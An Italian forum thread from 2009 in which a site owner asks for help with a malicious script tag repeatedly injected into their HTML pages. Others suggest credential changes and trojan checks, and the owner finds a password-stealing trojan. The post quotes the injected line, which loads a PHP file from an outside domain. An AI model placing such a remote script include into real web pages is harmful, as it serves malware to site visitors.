Script indesiderato

vultus5 · 23 Ott 2009

Ciao a tutti,
da qualche giorno a questa parte ho un problema su dei siti che gestisco.
Praticamente mi ritrovo nel codice html di ogni pagina uno script (che non ho inserito io) che cerca di aprire una pagina.
Il codice incriminato è il seguente:

<script src=http://tintasecuador.com/tarjeta/.ftpquota.php ></script><body bgcolor="#081052" alink="#ff0000" link="#80ffff" vlink="#80ffff" >

(si ripete in tutte le pagine html del sito!)

Ho provato a toglierlo e pubblicare nuovamente il sito, cambiando le credenziali di accesso.
Ma, senza una regolarità, questo ricompare!

Qualcuno sa darmi un'idea?
Grazie

maxbossi · 23 Ott 2009

I tuoi siti li hai sviluppati tu?
Se "sì" si tratta di siti statici (in HTML) o dinamici (PHP, ASP, ecc)?
oppure usi qualche CMS?

vultus5 · 23 Ott 2009

Re:

I siti non li ho sviluppati io ma so che sono stati fatti con SiteSpinner...

lotus · 16 Nov 2009

Ciao non credo che il problema sia SiteSpinner (a meno di una versione particolare)
Le cause del tuo problema potrebbero essere molteplici; per iniziare ti consigilio di modificare i dati di accesso all'account ftp dei tuoi siti e anche la passowrd della mailbox con i quali li hai registrati e gestisci le notifiche.
ti conviene verificare che nel tuo pc non siano installati spyware o trojan.
Occorrono poi, come suggeriva max, maggiori dettagli sulle pagine.
Linguaggio,framework, etc.

Facci sapere
Ciro

alessandro1997 · 16 Nov 2009

Intanto ti consiglio di mettere il sito offline per una settimana, il tempo di esaminare la cosa. Mettici una qualunque pagina di avviso, spiega il motivo e via. Inoltre controlla se, e dopo quanto tempo, nella pagina di avviso comparirà il codice incriminato.

Credo che si tratti di un trojan installato localmente nel tuo PC oppure qualcuno è venuto in possesso delle tue credenziali, ma di quest'ultima ipotesi non sono molto convinto. Cercando su Google non si trova molto a parte il tuo post, ma sembra che tu non sia il primo a riscontrare questo simpatico problema.

Zed Marlin · 17 Nov 2009

Io ho trovato questo link con l'identificazione del Malware:

Wepawet Analyzing Tintasecuador

Se può essere utile..

Ciao

vultus5 · 17 Nov 2009

Ciao Ragazzi,
ho risolto il problema.

In un pc ho trovato un trojan che faceva un sniff della password digitate e poi le inviava a qualche server straniero che sucessivamente si occupava di fare l'hack del sito e aggiungere lo script.

Grazie a tutti.

alessandro1997 · 17 Nov 2009

A questo punto ti consiglierei di cambiare tutte le password dei siti a cui sei registrato.

Cerca

Cerca

Script indesiderato

vultus5

Nuovo Utente

maxbossi

Amministratore

vultus5

Nuovo Utente

lotus

Utente Attivo

alessandro1997

Utente Attivo

Zed Marlin

Utente Attivo

vultus5

Nuovo Utente

alessandro1997

Utente Attivo

Discussioni simili